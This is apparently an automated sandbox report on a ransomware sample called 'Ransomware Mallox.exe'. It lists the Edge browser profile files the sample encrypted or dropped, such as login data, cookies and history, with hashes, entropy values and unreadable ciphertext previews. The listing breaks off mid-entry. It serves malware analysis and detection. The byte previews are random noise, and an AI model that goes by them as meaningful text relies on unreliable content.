                    Preview:Y...O@d.Zp"..E.5..R.fy.+....DPdE.....D.^7.m...K.):#.9..zO..o,!....Jb..f.^W<LnEL.h#...bC.O.(.%.D'...=...t.bq.`..Y.6....*.5.U.....@..deb..=......,...xd.;HRw.V.....qu............_!.........w^Y.Y...N...D}B}..z...i$~;......}........fi}e..?s...Y.'/`.v+..-..K..q.y...p.A.foS..g.E.iw.......w5...Rr.j...s.X..M..=.F:..}q..n.J..4.....%6ryIVr..x.J#n..M5..\.....\e...O.y..h\f*...[lk?.....5...?>sD.(:c[!%.......Dl. .|..R.....&.`..~].54D.Ty..X.f4.).@.Y.V...<d..zKx.h..~....X....3...r.....SIU4.p-0...+....@.......LE.......59w....Y.X.V.Ck.&+..b.<...f..#.W9V..........nO.w...........E"X.M@.<..c.f......@.B.@m.`.YHG'.y....f.h.JL...d...0..........=.....1.x.<..l..Z+.......=.X.T_...... .Ryk..fT.B.................'.t..._._..U.sL.xgc....~B..E.:l.T >..<..ND.P.....F.g. j..$.1.....=..h.-..b(.75.kLvw..n..B..6X.P..@?...p.M1..1K.;...1...60d...z~.......a(m.......2.]\5r......M.C...._.....D...m<..(.(X..c...8l....(.......aA....}.^pOG>...K."...._P.C.\22...L...*.!..b......a+.[

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.992037545129772
                    Encrypted:true
                    SSDEEP:384:8DoC4w80ZCPxuLo47HjILMvU3cvMj7JRRahJaSMtzT3pZFUv0qI08KUhPvA:8oCJwPoEosPMv4Z6ESMhzrZqQFA
                    MD5:A393946081AECC25CD1C41E23A11998D
                    SHA1:987A0CCD701AE9880C1C6BF745C0FEAC8CFA3129
                    SHA-256:4EFA4B4A4528BC402A2B1FA112C5291A9F67F06474B016C4BC1252EB906C0D51
                    SHA-512:996FFC2B727217E053BD1F94D7AE0130DA86390D30C47A375F558A897610770015026618C4932C9C2C29CEDF0257F71B9496F356B8367F63118C30CEB181B586
                    Malicious:true
                    Preview:_MsGp!dV.Y.5...w...d.e...p..`.iQ.%...j.U,5..1.v....g,.D.....L.g'..A-..!W.....g.!3t.n.V..n...T../.y.[hQI.....s.r..*..xw?..*{.G....'(sz%K=HW%...;o..A.....*....l.1.s.#.m..6.>XF._Is..-...tB.!...}YT..3.J......ra......y.D..nx.@...^.!..H.&."..B.l/e..B.>.3J..M;;Jf.YH-..i.)W,....R,)..........,....t.(.I.:.C".F... %.e.F.u....!.\.._.H......[..H.%A.PD.!.N.c..*.I6.i..B$Q..c]..$..a..k..*...F....F....u.9.(Y..5..u7&.H.I.w.CM.'E.EOBRov...`y..n....4...1.. .c:..K....d....g.7EF.........).9...S..a.._.v....I........L...[...3...)+.....T.7...J..M...."/2..."....=y[F..OY....k.....+F+_r..a....x.L^....=x.C.Z...(..'........ry....._L..\<.{.`3..2..X..R....-....:.M-......@._..|....s. D..5<N.=................d._g.>.u4.1......D..t.._..x.....X...4=....GI.....y...w.k..>jdMH.C...#.T..... .G./..3..-.V......jv....>...Q.$.x...%".5s..&..V...A....ww..`c]T`.;...m*...|B....z.e.&~.o8...."y.64A.nU..!=aw..&...."v...M..t.p..%q-O.B...M.....w....O.1.A.<.JCP.p....^.u0..r.....2AN...T6..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.994688687241642
                    Encrypted:true
                    SSDEEP:768:OWUSvubRkUTIJU1csLlAiGrBwPOIewwO207V1yCt4HflC:OD/ukIJYtA5r9Qd20byCmHg
                    MD5:144AA64FD39284B024B10EE1B127D54D
                    SHA1:A0842DF59079678460D01B112D985CC99B8DBEFA
                    SHA-256:B66D32D2954F018E68BE2FDCFF89B8EFB31266D86CEFD1FC0C0253FA64B1C8F8
                    SHA-512:6DCBD9DC8450D6AFB7CD5DC235891DE95F2BF141C90F341FE80CA5B41E85835788578C11602A471355D428FBA3418820CD4B792058286CB166FFF0D1C4D70C6B
                    Malicious:true
                    Preview:=...v.SVV.N.2...g.V...B...%..4.!.x.....U.C)U6..Ogz.......m....}.5........:v9.I..Mo.$.R....fp.U..M..........O..<....P....g....F].iM..pN.K.4N.]R....RM..}eg.k%...o.h.P..s...._g.o/:,0..zl.2I.-?n..w'.)&.DC.i..Lc#.6....E.......i.. ..-z...CY...vM.`D....H.0..3=.a)W........k.'?.+,.!..@.'W...}a;..=..7.l.........9....N.......a|.dQE...".Ss....e...:..4.}............T..........3!q.&.=].t..!...... {._.|..owFj.i....R8i..XI...l.D.F4..ne.r.k.?i6.......3b.......U]|..(NGk.W....*....a....../..w/.m:<..&j.J..Py......i..FX.y......`.)./.pj.`.f.O,..5[..6....")......|.V.:ex...n..k`..1[.....|:H.@.....)Z1..>."....d..._a......0.+.B...R.2@...BC.do.J.._.g...2S.....Ry:.8...>.^i_..r.Kl(m..J..!S&Q.z..\...dZ...H.....i"O..9....T.'..t{..A..#.!M.t:....C...f.....F$=*..j.....<2\.eL?.._;......f.v.a!w...@iy.2..&...~Go.......e.2..tB;4.....m...d..c..W~......G..y.1.!.i('.....k....W|...(.z.Z.7...._.Y~....y....@>.`..B{..u3....{....X..o...S.2..Wz.V.J6..7....3.\....E...rV.-#.*.d<.r._ I<0.'...|

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):18626
                    Entropy (8bit):7.98985880894616
                    Encrypted:false
                    SSDEEP:384:FD63YNkqQ4sA0xCohkw/1M3LwULinQLWVVniMwI:FDGopCAwhkKyzLmQLsVr
                    MD5:45E10B739AA9810A92E12CBBB37FCD9C
                    SHA1:8A09BA01B7EC366106C4F986AC04C85F09E581ED
                    SHA-256:A819B04B300E3E393D989D952FABF6B7FACF2DECFFB0AD89EBA3FD3C4815DD94
                    SHA-512:0D97FA1DBE7BDB8C3E188DE075F355FE6BCB13F2EEB5C436DBC442674A6E1E3F1A5E8C62D98380C3A06EBBCDAE15D255D39F8A0AA8BE56CD92118FCD763D327D
                    Malicious:false
                    Preview:.......~....(D..&..q+...]..??Z..Gk..-.iMG.S....<u...04Z.h.t.!..........4.!.....r.Q.=$x..3.....wY.\...<.*..,..d0x..._.d....!.7[.....N.l.P86.........e.5.3.<..;2.... .2.....B.;%....x/.'.W.?..].#;.nd....H..r#...4.Dw....E.|.......^b......ce.&(&._.y.m...o.[....{NQ.:p....a..M..&.".#..%.f.....g..1....U_m.{>............v..9.4.......[...>H..^d...&@.>..DB..1........9..;.....O....Q.J.5[.$..|..d..5.....E..67.......LO.1[...=k...R......~.9.C....x......j.....:.wE.fc...U1..7n5._.o...L....e.....r.%.C.........2..b.......:....hU..|....].5[n....a.....N..(9..|.u@..0...........rT...........I.Z..[)4..y...Z.......s.+".8...........l3..........M.[Qt.Y...p.t..\.{...4...m.......P..$....~..o..j....fl6~`@.<...I....E.Sn.}n~..t...?2....F"m,|{A....7.P1..x...g......".;O... S......aW]..w..0....'.ss.U.LEK.A.D.O.....^..]F.m._....[....$...\..e...x4.q..t...(%....nv.K_.+3.<k8.d......G..^x.)Th.........T.*1.a.%.....L.....FRm....r..N.`....w..KP(`.q.F.{....N,..C......A.nIE..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):80377
                    Entropy (8bit):7.9979188875750795
                    Encrypted:true
                    SSDEEP:1536:JeTLlVhDE9d/UhBbkAvv8M3HoNgiQtXVVTaG9WE6D0DJ7zGcYmlZsjK6H:M57DE9FUhPvvaNgPltaQl/G/qsB
                    MD5:C45529D01F56E7454454B068B43FE878
                    SHA1:5798A97A0238C8BCB0978A55DE3F27878511E9F6
                    SHA-256:3B9E3A156A71C976729A6A5CDA97E1E93EA3ACB916C43A2323B7480F19771172
                    SHA-512:35C2891B890E91531CAD07D78FD599B495B2DA427978B680ABE0AE8395321E7A4FA87332680C522E6AAE05CD9C1E7B74AD23007671F72B08B79111592BBE24E8
                    Malicious:true
                    Preview:GG.4X|..WkM..+w.^..v)\\....67....X......3.i..I.U]./..........}.EKSD._ .B...g......sO..4.z..........W....+c....u..x.T......um..";.@....S.I.W_.~.&;..=.5.P[. ..R...-?..`...........,...-..\>k...............E..$..e...}..._..6w6...ES....E.....]....w.pT...ps....(.^.u.N2 $.T...C...@.....0`..=._....LF.rdgw...1..6..g..N.v..K....L.\..o$.......T~_..}P...;K.....NP.zi...(&vj;.[.l.C..FsT.<a+....fr,SV...q.+&.m...>...1.....*..=g..@.X..7Q...t:.........Sz.[".3A..u..r....E).^...].!...f...t.ZI~........+..}....m}.`..[.&.9.zY..u.i...>..#.....Bvx.lx.......W.....V.We.m.x..K......hr..,.S".6.4..iP.*..k~.\.03d@G.e]=}*.UP....5kdC8.e...M.L...c*<V....k?F..4...G.z....$.Z.,'...... o.?.B.tL%Mq..5\.6..$P....}.u^v....}BM.\.;4.|.w4..h<.Cj?.j0x+...m!,...eG.Z%.`.sX.H.b^...m/%.o...%..n)......$...pl..24S^.f.na.......T2...6\!..b.E.,........L.p.B.[.........S.:.|...EX....I#|.........9..N....Vk"..Q.<k!...Oe...;6.]..m.Fl...zz....yU/..U7A.2SM..o....|0Zy^.&s.M..q..=...H.W.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.990338024003255
                    Encrypted:true
                    SSDEEP:384:88WRKK5zNpnEslBePV0dCQFkRocQiHcGDqoPgHsBVga2cVD9ULfx:6RKozNhEsbet4F2oc1HnNcs/37Ojx
                    MD5:EA1BCF87352B4C0B4C8EDAF8A9B36B05
                    SHA1:9685A13469C87E7B02864DF62665A0BAEAC6F334
                    SHA-256:2DB58493CB199290C57C4C928996D1CEB0343B97E35D138A3B07BC89CBF40DCE
                    SHA-512:E5F0AA85C38FBA2E7971449C67FF8C6609A63E31EAF5FD00595A2EB2B4E17DC12EFC3FB6FE55B8EF17B7203C33DF2FAAA328B247082A9969688A026EB14A742D
                    Malicious:true
                    Preview:..ZX.p.l..-.......os..2...s+....%kG....3l....c........G........C.8....e.31o..,U.7......G..%6"d....(...17.5....:..T8.Kj8.m.T.(..:5d.,......6...A.f.bMy..O.].9.j..u..O.9.#...2...+.m...*.c.*&....,F:kQ.H....v;..`@.\IT......Z/...E......{N....U....u..)#.2.............E9`..Ws....;}.b.....[3yQNF{{DG.vUj.w..?{..gn.R....9!b.0.|... .qf.!C*c.._.}.......... ....}7.p...C.\.j.....B.O.......?...q5e.f.z.,.........'.....A.Q.o.iV..l..#>.;..Y.2.>......C.....Q....MP..........x..`_a......e#..1...[.i..5.x..,.......-....Pk.Q.z;....h....W....1..>~....-..`|!q.k..]mT..2.....eu.AF...`.0.EWl....R:.cU.N..t+n;..;c".s.q.F...)..#...(.KAb..0.L#.....b.J.'P*.s..[......p.{..S7h..7....-...)U.xTF,..:^.;.1q.7.K.d.c3....f........9.).Z..BWn/Q.........A...B.(bTl.....!....JV.s....hI,..z.P....r=..qNYE.....YA}^=....]...g.......&.s....;.....).........H...m6.......U...C"..R'....!.\........+F0v.;..g`\....KY.._P$.0q..q....}.n.. X.....w..(pb..........T.GI~-.A.A}u......8.z3.....N%IZ.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999355976840866
                    Encrypted:true
                    SSDEEP:6144:/kiBOTv/++vdAT3Svi2oWVCz7WW1zIycm59S3Gs3kfQkX3W5:/kiVydAJ/iW2bmbS2sMHW5
                    MD5:EDE6C4C28731E0CE226C0E131057FC2B
                    SHA1:A20889CFAF5C503B57DDD62B672A210D70F4E73D
                    SHA-256:DEDFB5345C31C3F4817389BFB01F6B407A43B1F3C9E840F6C5CDCCB3E4E019CA
                    SHA-512:1E83D03DCAD136E5C6FDD6C2F4F9F72D69B43364059A065C259DF7384683ED3C840AAA1BF7F489A30EA009A433E0E153B964025E43C8C9ECBBCA42D3E395399C
                    Malicious:true
                    Preview:..w.u&...L...`..\.....q...c|O..+.+[.c.......2.|.B...'ys.e.a-..A..*......x....9.......(#..Id-.......2...)....\.MV.WP.......r...\.......X>.n..%.-.~.\.....CZ.:.Zj4....,..R2.M.F.e..v..=q.......F..z../.>L.Q...f.G..."O...a..*JS3..K...p.xp...jZ..`E...>.x..}.n..nK.."iP...k........;$*.&_..'..G7.x*k.:.o<.*...XKSE7=..$..5...pl...f........E).......D....s.6..W<..Bo_....l.a..4..&.t.O.z.'u..4.0..#[..R.E:...v....1.....[....w..|.Ff..........".....D.mbMP..RB....r..........5.E...aM..*.p....`%P...~..!...Bw....O.....z....D.R....u.Mo..`... N[.......i.fQK.P..:;M..yJ..z,u.>4I,e.\..........oR...3...+...]......O.}. ....Sy....'5..4}..S........jg...88q..5.?>.FR..2V....YJyk.nu*Y..X.&...G.....[..3....q..y ....d..V..-m.....<....C..v..b?C.e.8....`..^.FQ.... .....}.......{...h..<..,I@.}...k.>.......G.L}.HN............eR.~...L.....7.p........E..o.....7V....n...0.t%... K...m..*.+.^..c..l....U....{0._.n......@5.^.6........W.B.RBd._.....\....._.`..r..-.xb.X..vq.TV...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999292211530283
                    Encrypted:true
                    SSDEEP:6144:SMAO+X7NeO0YTmkxPvK2iD7AQY3gYYGLg3qhKtBUNm1PaIpGO:jZ+XZe6aGID7LYQRYHhSUNmVrpZ
                    MD5:13DECEF450DBB02FD3C0F430B49FA745
                    SHA1:98CF27BC1B1C074C655798D89F136875C3D01E78
                    SHA-256:F04FAB32974F97BBCF8D80A301684A980A34DCBE772BA604B462B09003C8A1BC
                    SHA-512:518DF800D137A78A8D45355B268DA0D4F06F46975E2822B6FA4BCA3956003D403D70DC0C9E4B641CE5B8B6B1465AC1E23CA1EC0CDC00387F9885E66957478A28
                    Malicious:true
                    Preview:.....SbL.k.+..a...4.[.O.i..W..."....7z.~.0.i...T..&.".....p.F..T....b@...It=N.X..d.h".c7..1;4..1.~.?.....N..0';*...Ti..........h......R.4IcB.7=.og.^......@....p...-...U..]......d.n.R(\.DLS.Iz...7...n4@...O...l^..Y..N...;.j1>...'..e.i.O.'.Qi.p.x......T..{.#..tu..%n....B.S?...........K.9.3..I....1k..|..#..H..&....LOh.C.$.].....f..kh.}.aS...Y....B91..{/>......kXv(A..Go....$../..o.&!6.#...5.0..W.g...DD=......9...3...D..m.&.ac...... ..N...!t......4.+M>..X..`....C.?......'....&u..W..6..`...<T0]b7.....M...+.]1b........BS...y.:....P.=W...C..L......b...@...3b...E..&..LP._\Q.-.BX..R..Y).gF.<...t..(...A.R*..u%.X.0...eR.~....3......vg.k..Z.T\.....b.T.mo.i.S.....)..tF.1....C...VD.Y....41.YJ.Zx.(.u..(.....F..r.....[=...3._w.T[.......2..S........mZ....I..l..c9...'..E..T..c. ..b...t....~....V.D.P...W...(..9|.V{.)..;.rd/S.b.(......%o.3..z.....8..3.~......3..X{..H'...Y.\.3.T..c....Ru.e.G.y..k.f.I...C....)..C^c....L.h}s..=.7..vJ...0<.!:|.`..X..: ....3.S

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):155756
                    Entropy (8bit):7.9988212008255895
                    Encrypted:true
                    SSDEEP:3072:B4QkRH6TIs8sZCGi4EVjXiNU9bdRHVPI72N0vwL4fUcbf5uq48:2F6TItsZvi4EVjuaHVw6ow8fUcz5ut8
                    MD5:59D9738FE3F4263B254039075C98CFAD
                    SHA1:18F369FF4BD502E74EE980F9286EB4D77528F71D
                    SHA-256:FF3C6B07A39498E89C33222F6DE844960C213F3201E59D36F50A48BB01BBA9E6
                    SHA-512:F2EE60E6997EC8D9ABDF5DA623B79BE54F349588299CEBE5023F7F6F28C3EE4BB6FF431276E7AD6DE53F5BAD5D2791A8256FED20CCC6F3F8B96E1D6CB8897ABF
                    Malicious:true
                    Preview:.........<..7.o%...#.>h...[.lE.w...\...z..x..".l.....cy9.....t'y.C.......C.y......YjZ.Lk9...z.........8.f(0..D+._.. 2.~S....#..W..~H..b...8..$OU{.....7n....h3.....CJ.i..U.X|..x.^.Pv..#1.....A...9R...{.v.&...F9...^.x..6..'b.9.z..na .N..3...o.1B.Q\..G......A..X04..",.........X.^.M...R.U.>NC......w>%....p.......vn.1.$.Wf....Xb...`4.....'.T...V$...R...*.F>P<.F;...B'....X.k.x*.SR.U8....<..2.7...d..iU.fR.'.."..l.Zr..;.q.}..X.......S...si..`=.....e..ciY...-h..w..\...k.......d.....u..pS.....!...$..m^.j<.s..".Y_$.T.z..8.0M..nv...3.Zm.H_ir.`3{.....S.=Y..5@..RJ..CAL.p......%.^.....b.....E.d.Q.L....\..........-:>..]u.!....4......)...@...X.0..2..ice.....B.G.]+.v....]......)r.c0..=..|..j`iYg.R.}X...Y ..|......`j.?zw.vr..:.XkI0w.....m`...9......|.) |E,J...%...L.k..].\.)k..L.U.hU..0..e.. ....op..]..A.A...5...4J.......*....+..~..J.X{......z..A>.F.c..S.&....h..........SD.8....."...,@..t....;..... ........n....G...+..z......T...x....&...A..Sf....V..U..7UpV...../.-

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28780
                    Entropy (8bit):7.993702967302249
                    Encrypted:true
                    SSDEEP:384:Bk1qlprGtdZE7QsUe/MeAo8f2tRB4Z1kgpznjnnogCDaWTPmTfKIZmO:b6to7l0eAo8fQ8znrmaWTP6UO
                    MD5:F8F88225730D51D7A2D4C80722D88EF4
                    SHA1:AA604B2C16F5B84D7603762E1F080A20EB6FCB4A
                    SHA-256:BBDE3445E94E13409B693916C9B0DA1650C07389644A62F8086C92B0F50D4F87
                    SHA-512:FE345B9CBB9BD665B3C380C4DC337F795A9FB9D50241D35D1E7D16159CA98146552AF263D9D7CB6C70AD0C5A718620A623258E0B1CEBE904C612084907D35E9C
                    Malicious:true
                    Preview:...!.lF.....M..Kh.>.n....Yl..b..jh..^.....qzF........oy...... 2K<9.,.=.1...Sf,.......0$...Q.A.m^...v)..Q.7..J....=..?...N...Yb.\...X.\...HG...........R?w!..f.f.&..Y7E..}..k....c..ic......<3...y.vS..9.Vg......+N..............{....6..~...g.....}.^%e..E!..."..:.-..fV0...D..0Pm....,g).*.........>JP..vh.#5)...0.W|.....q..Uhm.U...Q..x.....U.....G.....-.....pqs.. ..(F=...:.....UI.K>..R..$I..F......>.4.....+PS7].jQ.<.].$..d.a..m...cS...._...R=.s[..n;..,(E.G.lr.=...Ek8.). +...7*cWiW...+.$.....?.LR....+g<..0.J<..lj*..r....bK.K.Mf.:...!...yXlt..V.ZR..(..+...'K%...<3..<..^.G.[/.e....24C:...PP}S...2.....r.@.-.u..Xx....BBl.....W...~.?s.=97%.....g.A....3.... ...mE..S.Q@....e.2.Dr...w^~n.....8......Z...+}.o...../?;....#"...I@..@.?m.e<....c.o.P..So.........v.u.g.S.n....T>...9u.X..x..........:....S.b....2...hO...o..[...W<'..........bb....+{..8.^'WH.a.....i..y.....H...)...O...*..6;.h4..c~.}.7:j.e.....ME.<...#.z./.fT`..3......8..iyO.%....~ .e0!...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):51308
                    Entropy (8bit):7.996612632671921
                    Encrypted:true
                    SSDEEP:1536:2NBZ4z6ThVRpz4ZEmC47Wqqphu7LblkPVl9a:+4+TzRpzasGW1pE5kPVza
                    MD5:BFC4974F70C08E4AC0C63EB872D350AD
                    SHA1:56E1674EE007CE2306604BECE41BA029B6049080
                    SHA-256:8389B3F03ED136000CDF7957244598457AAFE4DEBF471FB1BFA748D12F55A84F
                    SHA-512:BFB78A8551F5891C01EB3E9B1F17C5BB49D27CC50BEE2EA12CDCA8FC2FB01DFE2E69B2BE99418633211D708CD00C42D0A711F813C15EBEB89D37109523BD3AED
                    Malicious:true
                    Preview:....'.k...b....d..a..Px......;t*.,G........,...w...2......&...~.7......n...].j#.r... L.+.E.W..#....C.h.....5n...@..6..G.'..J8..1V.~Z..Am;.)$.Y..u.$.8a..:u.A.A.M...$.....r.K.$.....7....t.......V.q....r......bL..<0M.I.....NH~.:....9.F........Q..#A.,.......f!E....GJ.....b..].W....W...q.q.t.....\.7.]P....$&..d.".....N..}C...'nG....f .cM.@4N...Q X}..>Z...~R.....f..C.U.....L.$S..po....S&..b7.3..g.kB6.58....]........Mw..]......V.1..!{...!:..R.N......-.I."M.F..P;^b._.3.t...b........r{Inz...lVQC.....~.d...nC.}qy.........>.l..JO.O.s....B5..".....,5.3N.......}zlut.3Q.>>l*}.>8[.<lb.Y.-....$zQ|.<...|..........N...(...}.u#.5.3..5..!.@k.ci...Fw...&...k.Z.H.d......[@1qgR.,.>4}..m..B......pt...;\.4...D.3sF.....X-.G$..I!...Q..'M...g..2.."M..Aw40.Y......+.......).V....H.h.7.5,d.....c.N......[..h.@....BPS.0..y^'....v.....fM..\....S>s.Y......i}..O..\...Q....e...;..<...8..[..._.|j@m^.....Mg....O.)]P.]K1.FZ._.e.a[..|U..k8$. ..[#*.Ck.d$..E......AEPs..ut..?.)......5...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):45164
                    Entropy (8bit):7.995805848647011
                    Encrypted:true
                    SSDEEP:768:02l9edslNYRafR4MLkuQ6OiV3JTMXSKCdyL3bqK14TNgLQiJh1KzUS6J4AhQ/1/i:02esvYRau0XQWL7KCEL3+K14RcQK/Kz4
                    MD5:A23BD91AC5532953BF180326B382B05B
                    SHA1:AF21534D16B30B47A9877C07E000A188AB4E4FF3
                    SHA-256:9239698560F851C67F4925EAB31AF75570616E92BD44B604C82563D07B05B35A
                    SHA-512:F826F62009CEB43C07AF9A8138F82378F60ED577AB4DE391EF5DB3C5900C13CB810A39318A444053B62A2020AC80FF28717DA5275594D9D1126FEE07C416B276
                    Malicious:true
                    Preview:..].fi.@..W.~(k.....^C........p.sB..+...NT..z.r........A.<...& ..lE..},......=.6......5s.... .uU.\.....U.b.B.R.......q...6.........8....D..b..E....i.-.k.....+FY.@.....aR.FzD.....;oM'ni.WE<...L...?.B..... .:....q..z.l.....Y.U.w^^SL.......S.d.1q..x$'.lBR...>..1.-..c..h..X..?-.ULI......Rk..(7.../..Ybh..8.k.$.3*.;n.!B....\B..+T.IA.z...S...:.&....Z......BA.^.U.O....a.s...e.k......e..S.2;.....M.".h...^...O1.....wfI p...u.p1|....?4-..,...e...j.K...{....#3....>..cL..,B...w.'...*...;?.I.).*...s{.g.,g...$.#sH.RP.I......p.{.....R.k"*.....n.0..$>.......J..H...-{.t.....T.Z...v.N.o....kG...N....E..E.:.^AWY...F.?...m...z..(M_...u.T....A_I.....&h.]...R!..U...M.9z..j.=F\..Dw..`..Gn<<f.....k..Q...w.&<.....} .......;.j.!....y-rH..@l.......'.".S.:Y..BR.v=.:...n..Q.j/*._\......+wR....X.!R.3.?GZ9li..x;.vw.1......t..K...>.b...$......%df.p(..B.J...^...g...._d.....g..!7..?..Mo....'3j!e..*...lG..O.g...R..R..C...NKL.Cx.U.Qr.._...m..."....^...OJw-.y...e.6.....`....+.'..'..'

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.991282879296019
                    Encrypted:true
                    SSDEEP:384:sLi0e0J8+IkKp2nIRzlwarreEl2wFpED4W86e7RxpQ6C35Mir6soeo4O44Kv2qqa:sm0fJmp2nIhlXrJID4W81nC35MiOb4dt
                    MD5:7BB9725321B1FBC5AA61BBD86E24CCCC
                    SHA1:4D4ADD2D26403856C4CDBF54788F2643F57C82BE
                    SHA-256:2789036A4CEEA4BCF984DF2D874D10ABE0D460048E6632B7CB8C683CD98A1D07
                    SHA-512:DC9954050B29696CC37FEF8BF6EE8598BA3307512D3F0BFE6B522A46BE46A33762A673F2B0C662B0547E26381EFBDE5A6FEA27DB4335FC809607474AD6756A91
                    Malicious:true
                    Preview:).....O(.HL....67-.A....K.;..V......ts..=..?....Bl..).#4M.3...^..m.v.e0Z..Q.:.8.f...[s..4.Q..t....+8.qQ....g.K.....r.tR.#z.Wr~...ADe...o..'.kO4.......\.....3_;.. ..-..Q.*.C...H(Y.<.f.n..%.)r.eks....@D.8A....f...n5e..#.....G.s......E.c+..WH>Q....5.LC...ChF|.;...{.....q...w.L@.....5...Q...T.[++9I......Aq...5P.B..i....H$.F....$.7..201.......7@h.r.Id.....z.."Q.y.,..0u..........g^..j.....A8>.pI....p.o...c.4..Z.p`.4...".......S...ZvT....Byfi..FIq...7.<..3\-..y..&...`O!".D./.....|.b.M..............C..0.+.....,.E/..]..Z.?O...5cw.Xf9.....d...n.....*.........W...}.....n..J.\6.&l.i.Xx.x.y..I.1.V#fL.%=..19..h.c......C...L.g.t."..5.ba.8. ..S.,.L..=.X,.bez]..r%.i-J...o.&....(.5BY...tmB..L...V.u.3!.<..f.r..#...<...Uy.l...."'.0:g-.q..q.l.H..1py......V..}i...;......|+.T.Wz.Y.v...f...[..M.$i.....P.tf.....<2.V.l..=..H.. ..*......8e.X....lx..ZA..J..... ..]6...:..uTyX..6.9..{.....#.=...l.9...#.f..B..Kha.....*j!..8.f.j@......1."c|.4.'.qM..c#...R../...4bpuGc~

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.995443379459639
                    Encrypted:true
                    SSDEEP:768:knUnmWfaR84Lw263blWCIzBnB4kVNzZ1ABddVy/YGsxXWB80iB:kUmyaHN63RWCa4kV9YBddMUC87
                    MD5:21337FF62BECCE57A861CFA402484212
                    SHA1:CD24948EEEE43C7BA2B1B83A7A9421A9D3E74A3D
                    SHA-256:03BD8DDA74B38B8B5261B2092DA506A4BF7EEB3A42BA40793859D0A945411D5D
                    SHA-512:BB9147D615266B4E90DFBE8AA79D90C22EBC40E2C51E1FC9DA932A940EA71639D6F634E4B9A46ED42974E77892E803CAD0CB75C7EA867466B800BF4DD0DCCB82
                    Malicious:true
                    Preview:.t...H....?u.. '.....T=Pbi..\4. .I..v.\....#B.x#.}.;..._..>......"..X..e..>Ez.;^U.b./2[.0D>7..}F\...q..<).Z..N...q"........{.tff.B.3..!..hQ.......%....."a..c.<..Uo.P.p.p...~...9.N...k...4...d-...`.K.].....I..X..........S_VA4L..C..$..7..I.2..`w.F..5*2..@d.}.?..I.*..d...|".."...FfI...o...f..%...S.+.......qg...02...k...I..d_..c1..sU_..S..9.j.*85.a.y.E...e..q./...../.-....g .$J......o.5~C>.......h./.......$..H...9m..]Z9....}f..xZ.h..r..k.....U|.b...T...,;.d)...db.c.c8u....>.vUEW...KOy.wN.......+.S......U.N.)....?.B..Y~.I_....G.d.5g.......z....T.Q..C._...L.k....6.D.:.3W.O...s.?.4...\do.&.q.*..U.a.....T.X...L...)...WeMrg....h.z.l.q...}..o..a~2/....;..)...n+.{.;3.KY..O+.'Pi..8........TF.+{56QbG..q.D.\..f&^vm......gxzC....I?*+*...h.>`.Q3.K.....-.!.E...$*...u.5.B.+.g.%n..]-...%..=5..l...O..t..L.....O..X.........G....pS.9q.W.qUo!g....:G...9~e..K^.........x..Ym..E...SV..{k..~....b{..!'_.V>..N.#.^<x<....{)o. ..1...^z.....M.s..Pk>.L}O...0..nL].....X.).

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.995211183517574
                    Encrypted:true
                    SSDEEP:768:WWeq4cWuqhAAUytQUfYwCk+Q954/pPi1v3l7me:WWz4aH0QUAFQrWi1vZb
                    MD5:4A21CA30603BF9988B9FFE0C4A7E6225
                    SHA1:40862D7EC68A335913B2CE9E04AAA921F591F615
                    SHA-256:77EDBD72A7C84DDD658712C2FDEB98A1C6E88F1D58E8D1F14E12AF0D5C98ADF7
